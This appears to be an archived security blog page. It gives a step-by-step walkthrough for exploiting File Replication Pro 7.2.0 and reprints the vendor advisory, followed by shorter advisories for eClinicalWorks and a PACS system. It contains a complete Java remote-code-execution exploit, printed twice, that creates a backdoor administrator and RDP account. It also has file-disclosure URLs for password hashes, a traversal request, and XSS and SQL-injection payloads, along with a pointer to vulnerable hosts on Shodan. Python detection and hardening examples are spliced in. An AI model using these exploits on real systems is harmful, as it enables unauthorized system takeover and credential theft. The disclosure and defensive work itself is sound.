Monthly Archives: February 2016

Exploiting File Replication Pro 7.2.0

* The information found in this post is for educational purposes only and not to be used for illegal purposes *

Recently, a security advisory on the vulnerabilities found in File Replication Pro 7.2.0 was released on this site. This post walks through the steps involved in remotely gaining access to a system that has this software installed. As of the date of this post, the trial version of FRP 7.2.0 is still available for download at http://www.filereplicationpro.com.

* Note: A quick search on shodan.io with the keywords “FRP Node Ready” shows quite a number of vulnerable systems out there. *

That aside, the first step is to install the software. We will be using a Windows 7 machine for this demonstration. After running the installer, a few services are added to startup, namely three ‘prunsrv.exe’ processes as shown below. Note that the services run with the privileges of the NT AUTHORITY\SYSTEM account:

[Screenshot frp1: the three prunsrv.exe processes running as NT AUTHORITY\SYSTEM]

The unauthenticated remote command execution exploit abuses the way these processes handle password authentication to achieve command execution as NT AUTHORITY\SYSTEM. Using a browser, navigate to port 9200 on localhost, which runs the replication RPC service. You should see the following:

[Screenshot frp2: the RPC service banner returned on port 9200]

The “OK” at the end of the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” output indicates that this RPC server does not require any form of authentication; this is the default behaviour in a vanilla install. If you see an “ERROR” instead of an “OK”, the RPC server has been configured with a password and authentication is required. However, another vulnerability in the software allows unauthenticated remote file access, which can be abused to retrieve the password hash. FRP password hashes and configuration can be accessed remotely and without authentication using the following link:

http://127.0.0.1:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

You should see the password hash in the configuration.xml file. If more clients have been added to the FRP management server, all of their password hashes are visible there as well. By exploring the .jar and .war files in the installation directory and working out how the software communicates, you can then build a malicious RPC client. In this example, the client adds an arbitrary user to the remote system and then adds that user to both the Administrators and Remote Desktop Users groups.
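The disclosure above works because the log_path value is opened exactly as supplied, so an absolute path or a `..` sequence reaches configuration.xml instead of a log file. The following Python is an added example and not FRP's code: a path-confinement check that a log reader should apply before opening anything, plus a small parser that runs the check over constructed web access-log lines to flag requests whose log_path escaped the log directory. The log directory, the log lines and the client addresses are assumptions for the demonstration; the same check rejects the `../../../c:/` style of traversal used against parent_dir in the advisory further down this page.

```python
import ntpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumed log directory for the FRP web component (example value, not from the product).
LOG_DIR = r"C:\Program Files\FileReplicationPro\logs"


def is_confined(base_dir: str, requested: str) -> bool:
    """Return True only if `requested` resolves to a file strictly inside `base_dir`.

    Windows path semantics (ntpath) are used on purpose so the check behaves the
    same on the Windows host and in an offline test on another platform."""
    base = ntpath.normcase(ntpath.normpath(base_dir))
    # ntpath.join discards base_dir when `requested` is absolute (C:\... or \\srv\share),
    # so an absolute path to etc\configuration.xml cannot pass as a relative log name.
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(base_dir, requested)))
    if candidate == base:
        return False  # the directory itself is not a log file
    try:
        return ntpath.commonpath([base, candidate]) == base
    except ValueError:
        return False  # different drives, or UNC path versus drive path


# Constructed sample access-log lines (common log format). The second carries the
# absolute path from the disclosure URL discussed above; the third uses `..`.
SAMPLE_ACCESS_LOG = r'''
10.0.0.5 - - [15/Feb/2016:23:40:51 +0800] "GET /DetailedLogReader.jsp?log_path=replication.log HTTP/1.1" 200 1234
10.0.0.9 - - [15/Feb/2016:23:41:02 +0800] "GET /DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml HTTP/1.1" 200 5678
10.0.0.9 - - [15/Feb/2016:23:41:30 +0800] "GET /DetailedLogReader.jsp?log_path=..\etc\properties.xml HTTP/1.1" 200 4321
10.0.0.5 - - [15/Feb/2016:23:42:00 +0800] "GET /index.jsp HTTP/1.1" 200 800
'''.strip().splitlines()

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def log_path_param(line: str):
    """Extract the decoded log_path value from a DetailedLogReader.jsp request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith("/detailedlogreader.jsp"):
        return None
    values = parse_qs(parts.query).get("log_path")  # parse_qs also turns '+' into ' '
    return values[0] if values else None


def flag_escapes(lines, base_dir: str = LOG_DIR):
    """Return (client_ip, requested_path) for each log-reader request that left the log directory."""
    flagged = []
    for line in lines:
        requested = log_path_param(line)
        if requested is not None and not is_confined(base_dir, requested):
            flagged.append((line.split(" ", 1)[0], requested))
    return flagged


if __name__ == "__main__":
    for ip, path in flag_escapes(SAMPLE_ACCESS_LOG):
        print(f"{ip} requested a file outside the log directory: {path}")
```

The check is deliberately done on the normalised, resolved path rather than by searching the raw parameter for `..` or `:`, because encodings, doubled separators and forward slashes all normalise away before the file is opened.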

The following exploit code is used in this example. Remember to replace the IP, port, and password variables accordingly:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to :9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);

        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        //add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}

The following screenshot shows the list of users on the Windows 7 system, before the exploit code was executed:

[Screenshot frp3: list of local users before the exploit ran]

After the exploit code was successfully executed:

[Screenshot: list of local users after the exploit ran]

[Screenshot frp4: state after the exploit ran]

[Screenshot frp5: state after the exploit ran]

If RDP was not activated on the remote host, you can always tweak the commands in the exploit to activate it. You should now be able to RDP to the box and access the box as an Administrator.
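From the defender's side, the chain above is visible in process-creation telemetry: the service wrapper prunsrv.exe, running as SYSTEM, spawns a shell, which in turn runs `net user ... /add` and `net localgroup ... /add`. The following Python is an added example and not part of the original post: two detection rules run over constructed process-creation records modelled on the fields of a Sysmon Event ID 1. The record layout, the timestamps and the prunsrv.exe install path are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessCreate:
    """Constructed stand-in for the fields of a Sysmon Event ID 1 (process creation) record."""
    utc_time: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry modelling the page's chain: prunsrv.exe (the FRP
# service wrapper, running as SYSTEM) executing the PoC's commands. The install
# path of prunsrv.exe is assumed.
SAMPLE_EVENTS = [
    ProcessCreate("2016-02-15 15:40:51", "NT AUTHORITY\\SYSTEM",
                  r"C:\Program Files\FileReplicationPro\bin\prunsrv.exe",
                  r"C:\Windows\System32\cmd.exe",
                  "cmd.exe /c net user vantagepoint LOLrofl1337! /add"),
    ProcessCreate("2016-02-15 15:40:52", "NT AUTHORITY\\SYSTEM",
                  r"C:\Windows\System32\cmd.exe",
                  r"C:\Windows\System32\net.exe",
                  'net localgroup "Administrators" vantagepoint /add'),
    ProcessCreate("2016-02-15 15:41:00", "CORP\\alice",
                  r"C:\Windows\explorer.exe",
                  r"C:\Windows\System32\notepad.exe",
                  "notepad.exe"),
    ProcessCreate("2016-02-15 15:38:00", "NT AUTHORITY\\SYSTEM",
                  r"C:\Windows\System32\services.exe",
                  r"C:\Program Files\FileReplicationPro\bin\prunsrv.exe",
                  r'"C:\Program Files\FileReplicationPro\bin\prunsrv.exe"'),
]

# `net user <name> ... /add` or `net localgroup <group> ... /add`, via net.exe or net1.exe.
ACCOUNT_MANIPULATION = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:user|localgroup)\b.*\s/add\b", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events) -> List[Tuple[str, str]]:
    """Return (rule_name, command_line) for every event that matches a rule."""
    hits = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        # Rule 1: the FRP service wrapper spawning a shell. ExecCommand does exactly
        # this, so a node that is not expected to run job scripts should never emit it.
        if parent == "prunsrv.exe" and child in SHELLS:
            hits.append(("frp_service_spawned_shell", ev.command_line))
        # Rule 2: local account creation or group membership changes via `net`
        # under the SYSTEM account.
        if ev.user.upper().endswith("\\SYSTEM") and ACCOUNT_MANIPULATION.search(ev.command_line):
            hits.append(("system_account_manipulation", ev.command_line))
    return hits


if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Windows Security event IDs 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group) corroborate the second rule from the native audit log, which is useful where Sysmon is not deployed.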

Here is a video showing the exploit in action:

Update: After a long time, the guys at FRP finally released the fixed version: https://frpsupport.fogbugz.com/default.asp?W291

[Screenshot: FRP 7.3.0 release announcement]


VP2016-001: Remote Command Execution in File Replication Pro

Vantage Point Security Advisory 2016-001
========================================

Title: Multiple Vulnerabilities in File Replication Pro v7.2.0 
Vendor: File Replication Pro
Vendor URL: http://www.filereplicationpro.com
Versions affected: =< 7.2.0
Severity: High
Vendor notified: Yes
Reported: 29 October 2015
Public release: 10 February 2016
Author: Jerold Hoong and the VP security team 

Summary:
--------
Vantage Point has discovered multiple previously unknown vulnerabilities in File Replication Pro v7.2.0 (and possibly all prior versions) that allow a remote unauthenticated malicious user to run arbitrary code with SYSTEM privileges. The File Replication Pro software is a file management solution that is used to back up and copy files from various nodes in the network. 

The vulnerabilities that were discovered are:

- Unauthenticated Remote Command Execution
- Unauthenticated Remote Arbitrary File Disclosure
- Unauthenticated Directory Traversal and File Listing

1. Unauthenticated Remote Command Execution
-------------------------------------------
The backup agent implements an RPC service on port 9200 that supports various calls, including a function called "ExecCommand" that, unsurprisingly, executes shell commands on the system. A password hash is used to authenticate calls on this interface (note that the hash, not the password, is what the client presents for authentication). This hash can be obtained through the remote file disclosure vulnerability present in the software (listed below) and used to authenticate directly to the RPC service, after which arbitrary commands are executed as the SYSTEM user.
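The design flaw is that the stored value and the presented value are the same string, so whoever can read configuration.xml holds the credential outright. The following Python is an added example and not FRP's code; it contrasts the two verifier designs. It reproduces the page's own sample pair, password 12345 and stored value jLIjfQZ5yojbZGTqxg2pY0VROWQ=, which is exactly base64(SHA-1("12345")), an unsalted digest. Beside it is a salted, iterated PBKDF2 record against which the client presents the password itself (over TLS), so a leaked record is only an offline cracking target rather than a login token. The record layout and the iteration count are assumptions for the example.

```python
import base64
import hashlib
import hmac
import os

# The page's sample pair: password "12345" stored as this value.
PAGE_SAMPLE_HASH = "jLIjfQZ5yojbZGTqxg2pY0VROWQ="


def legacy_hash(password: str) -> str:
    """Reproduces the stored format seen on the page: base64 of an unsalted SHA-1."""
    return base64.b64encode(hashlib.sha1(password.encode("utf-8")).digest()).decode("ascii")


def legacy_verify(stored_hash: str, presented: str) -> bool:
    """Vulnerable design (what the advisory describes): the client presents the
    hash itself, so the stored verifier *is* the credential."""
    return hmac.compare_digest(stored_hash.encode("ascii"), presented.encode("ascii"))


def make_record(password: str, salt: bytes = b"", iterations: int = 200_000) -> str:
    """Hardened design: store a salted, iterated PBKDF2-HMAC-SHA256 digest.
    Record layout (assumed for the example): scheme$iterations$salt_b64$digest_b64."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(digest).decode("ascii")])


def record_verify(record: str, presented_password: str) -> bool:
    """The client sends the password (over TLS); the server recomputes the digest.
    Presenting the stored record itself, or the old SHA-1 value, fails."""
    try:
        scheme, iterations, salt_b64, digest_b64 = record.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        iterations = int(iterations)
    except (ValueError, TypeError):
        return False
    actual = hashlib.pbkdf2_hmac("sha256", presented_password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(expected, actual)


if __name__ == "__main__":
    # With the legacy design, the value read out of configuration.xml logs in directly.
    print("legacy: leaked hash accepted ->", legacy_verify(PAGE_SAMPLE_HASH, PAGE_SAMPLE_HASH))
    rec = make_record("12345")
    print("hardened: leaked record accepted ->", record_verify(rec, rec))
    print("hardened: real password accepted ->", record_verify(rec, "12345"))
```

Two consequences follow for anyone who ran 7.2.0: the patch closes the file disclosure, but every password whose unsalted SHA-1 may already have been read should be rotated, and a verifier redesign of this kind is what stops a future leak of the configuration from being equivalent to a leak of the password.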

POC Exploit Code of Malicious RPC Client:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to :9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);

        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        //add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}


2. Unauthenticated Remote Arbitrary File Disclosure
---------------------------------------------------
A flaw in File Replication Pro allows a malicious user to read the contents of any file on the remote server. This could lead to the compromise of sensitive information such as user accounts and password hashes, which could then be used to further exploit the server via other vulnerabilities in the software. As an example, File Replication Pro's web interface user accounts and credentials can be viewed by accessing the following URLs:

- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml
- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml


3. Unauthenticated Directory Traversal and File Listing
-------------------------------------------------------
It was possible to anonymously view the directory structure of the remote File Replication Pro management server, as well as that of all server nodes managed by it. The parameters used to construct the POST request in the example below can be obtained via the remote file disclosure vulnerability by reading File Replication Pro's configuration.xml, properties.xml and .frp_id files.

POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/ HTTP/1.1
Host: 127.0.0.1:9100
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9100/AddEditJob.do?action=new
Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


Fix Information:
----------------
Upgrade to the latest version of File Replication Pro 7.3.0

Timeline:
---------
28 October 2015  - Vulnerabilities discovered
06 November 2015 - Vendor acknowledged and scheduled fixes to commence
02 February 2016 - Patch released by vendor
10 February 2016 - Release of this advisory to the public 

About Vantage Point Security:
-----------------------------

Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.

https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg

eClinicalWorks (CCMR) – Multiple Vulnerabilities

# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities
# Vendor: https://www.eclinicalworks.com
# Product: eClinicalWorks Population Health (CCMR) Client Portal Software 
# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/
# Credit: Jerold Hoong
-------------------------------------
# CVE-2015-4591 CROSS-SITE SCRIPTING
Cross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population Health (CCMR) Client Portal Software allows remote authenticated users to inject arbitrary JavaScript via the strMessage parameter.

https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E
-------------------------------------
# CVE-2015-4592 SQL INJECTION
SQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population Health (CCMR) Client Portal Software allows remote authenticated users to inject arbitrary SQL commands as part of user input.

Parameter: uemail (POST PARAMETER)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=
&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=

POST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1
Host: 127.0.0.1:443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp
Content-Length: 186
[SNIP] ...
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
[SNIP] ...

action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=
-------------------------------------
# CVE-2015-4593 CROSS-SITE REQUEST FORGERY
Cross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks Client Portal allows remote attackers to hijack the authentication of content administrators for requests that could lead to the creation, modification and deletion of users, appointments and employees.
-------------------------------------
# CVE-2015-4594 SESSION FIXATION
The web application is vulnerable to session fixation. When authenticating a user, the application does not assign a new session ID, so a session ID that already existed before login remains valid afterwards.
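The mechanism described is the absence of session ID rotation at login. The following Python is an added example and not eClinicalWorks' code: a minimal in-memory session store with the vulnerable login (keeps the pre-authentication ID) beside the hardened one (issues a fresh ID and invalidates the old one), and a function that models whether an ID issued before authentication identifies the user after it. The class and function names are assumptions for the example.

```python
import secrets


class SessionStore:
    """In-memory session table used to contrast the two login behaviours."""

    def __init__(self):
        self._sessions = {}  # session id -> attributes

    def new_anonymous(self) -> str:
        """Issue a pre-authentication session, as a login page typically does."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def login_without_rotation(self, sid: str, user: str) -> str:
        """Vulnerable pattern (the behaviour the advisory describes): the
        pre-authentication ID is simply upgraded to an authenticated one."""
        if sid not in self._sessions:
            raise KeyError("unknown session")
        self._sessions[sid]["user"] = user
        return sid

    def login_with_rotation(self, sid: str, user: str) -> str:
        """Hardened pattern: discard the pre-authentication ID and issue a fresh
        one, so an ID known to a third party before login is worthless after it."""
        attrs = self._sessions.pop(sid, {"user": None})
        new_sid = secrets.token_urlsafe(32)
        attrs["user"] = user
        self._sessions[new_sid] = attrs
        return new_sid

    def user_for(self, sid: str):
        """Identity bound to a session ID, or None if the ID is unknown or anonymous."""
        return self._sessions.get(sid, {}).get("user")


def fixation_succeeds(rotate_on_login: bool) -> bool:
    """Model the weakness as a function of the login policy: an ID issued before
    authentication is later used by a victim to log in. Returns True if that
    same ID now identifies the victim."""
    store = SessionStore()
    planted = store.new_anonymous()  # ID known to someone other than the victim
    login = store.login_with_rotation if rotate_on_login else store.login_without_rotation
    login(planted, "victim")         # the victim authenticates on the planted ID
    return store.user_for(planted) == "victim"


if __name__ == "__main__":
    print("without rotation, pre-issued ID identifies the victim:", fixation_succeeds(False))
    print("with rotation, pre-issued ID identifies the victim:   ", fixation_succeeds(True))
```

Most servlet containers expose this directly (for example, invalidating the current HttpSession and creating a new one during login); the point of the model is that the fix lives in the login handler, not in how the ID is generated.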
-------------------------------------
# TIMELINE
- 16/06/2015: Vulnerability found
- 16/06/2015: Vendor informed
- 16/06/2015: Request for CVE IDs
- 16/06/2015: MITRE issued CVE numbers
- 16/06/2015: Vendor responded requesting more information on support contract etc
- 21/06/2015: No support contract, vendor does not open case
- 22/06/2015: Requested update from vendor, no response
- 01/07/2015: Contacted vendor again, vendor requested for support contract again
- 02/07/2015: No support contract, no response from vendor
- 31/01/2016: Public disclosure

INFINITT PACs – Multiple Vulnerabilities

# Title: INFINITT PACs Health Care System - Multiple Vulnerabilities
# Vendor: http://www.infinitt.com/cms/index
# Product: INFINITT PACs Health Care System 
# Credit: Jerold Hoong
-------------------------------------
# CROSS-SITE SCRIPTING
Cross-site scripting (XSS) vulnerability in jerry.asp in INFINITT PACs Health Care System allows remote unauthenticated users to inject arbitrary JavaScript via the pname parameter.
-------------------------------------
# SQL INJECTION
SQL injection vulnerability in jerry.asp in INFINITT PACs Health Care System allows remote authenticated users to inject arbitrary malicious database commands as part of user input via the uid parameter.
-------------------------------------
# PASSWORDS ENCODED IN PACS DATABASE
The Infinitt PACS system does not implement an encryption scheme when storing user account passwords in the database. Based on our observations, the application applies a “substitution” operation to each character of the password and stores the encoded result directly in the database.
-------------------------------------
# INSECURE PROTOCOL USED
The Infinitt PACS system communicates with the DICOM component using the HTTP protocol. The system uses HTTP basic authentication when retrieving DICOM images from the server, which includes the user credentials encoded in Base64 as part of the HTTP request. This can be trivially decoded to obtain the authentication credentials in plaintext.